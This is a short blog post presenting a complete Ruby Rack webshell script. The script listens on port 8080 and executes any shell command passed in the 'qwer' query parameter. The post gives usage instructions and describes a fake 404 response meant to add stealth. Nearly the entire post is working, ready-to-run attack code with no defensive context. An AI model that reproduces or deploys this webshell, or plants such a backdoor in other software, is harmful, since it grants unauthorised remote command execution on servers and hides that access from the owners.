Monday, March 7, 2016

Super Simple Ruby Rack Webshell

Similar to my Super Simple Sinatra Webshell post, I've created a simple webshell using Ruby Rack. Simply run the below ruby script and the server will listen on 8080:
require 'rack'
require 'rack/server'


class RackWebShell
  def self.call(env)
    request = Rack::Request.new env
    response = Rack::Response.new
    unless request.params['qwer'].nil?
      response.write `#{request.params['qwer']}`
      response.finish # return the generated triplet
    else
      response.write "ERROR 404: File Not Found\n"
      response.status = 404
      response.finish
    end
  end
end


Rack::Server.start :app => RackWebShell

You can execute commands by simply making a Get request to /?qwer=<insert command here> (You still have to URLencode spaces and special chars)

And if someone doesn't supply the correct parameter or path, it returns a 404 (provides a tiny bit of stealthiness):


Posted by
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)